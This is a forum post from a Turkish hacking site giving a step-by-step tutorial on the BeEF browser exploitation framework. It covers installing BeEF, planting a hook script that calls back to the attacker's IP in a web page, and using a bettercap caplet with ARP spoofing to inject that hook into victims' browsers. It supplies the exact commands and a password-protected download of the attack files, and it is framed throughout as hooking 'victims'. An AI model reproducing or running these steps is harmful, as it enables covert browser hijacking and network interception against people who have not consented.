What is BeEF Framework? How to use? (Exploiting Browsers Tool)


Katılımcı Üye
1 May 2020
Beacon Hills

What is BeEF?

In this regard, we will examine a tool called Beef. This tool is called browser exploitation framework, which is a tool for exploiting browsers.

Hackers use this tool to run javascript code in the target computer's browser.

BeEF consists of 3 layers.

1- Personal computers of the Attacker or Attackers
2- The server where BeEF is installed
3- Goals

How to Install BeEF on Kali Linux?

We open the terminal and we are writing this.

git clone https://github.com/beefproject/beef


After the installation is finished, we are writing ls to the terminal and we see the beef.


We are typing cd beef and go into the beef folder.

We are writing./install for once on purpose and say "y" to the questions and entering.


Now, when we turn the system off and on, it is enough to say "cd beef" "./beef".


The error here is asking us to change our username password in beef.

For this, we are writing nano config.yaml in the terminal.


After the user and passwd are changed, we do "CTRL-O" "enter" "CTRL-X" and scolding.

For login to Beef, you can enter ./beef by clicking one of the addresses below after typed.


Friends, I will show you on apache server so that you can understand BeEF basically.

First of all, I will create a website by using the service called Apache in Linux.

This is for example purposes only, you can think more creatively and hook your victims to the hook.

For this, I come to the console and I am writing service apache2 start.

Then I am editing the index of my site and I am going to the /var/www/index.html directory.

We open the index.html with the help of a leafpad or another application and we are pasting the code <script src = ""> </script> into it. You are requiring to write your own IP address instead of



To learn our own IP, we come to the terminal and we are writing ifconfig mine is so I am writing the code like this <script src = ""> </script>


Yes, our goal taken the bait, the victim has to stay on the site in order to reach our goal for a long time.


We will inject a Javascript code into our victim's browser so that we can access it even if it leaves our site.

For this, we will use bettercap, which is available in Kali Linux.

First you are requiring to download the file named beefcustom.zip that I gave you below the topic.

We are throwing the file named beefcustom in the downloaded RAR file to usr / share / bettercap / caplets directory.

Open the file named beefcustom.cap in the Beefcustom file with a leafpad or another application.


Instead of the ip where it says set arp.spoof.targets, we are writing the ips of our victim.

Then we are opening the file named beefcustom.js in the same way, we are writing our own ip address instead of, save and closing.


To run Bettercamp, we are writing bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap to the terminal.


Yes, now victim online, let's try our commands in our victim's browser for this, we are clicking on the Commands section shown in the photo below.


The green ones mean they will work, the red ones mean they will work less likely.

I am clicking on the Browser section in the Commands section, there is a command called Create Alert Dialog in Hooked Domain, let's try that will send a warning message to our victim.


Yes, we have a warning message.


BEEF CUSTOM DOWNLOAD LINK:https://www.dosyaupload.com/cgZ8

RAR PASS : pytang

VIRUS TOTAL :https://www.virustotal.com/gui/file...23f57240b2e6273c6b5ed04edb1168a8056/detection



Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.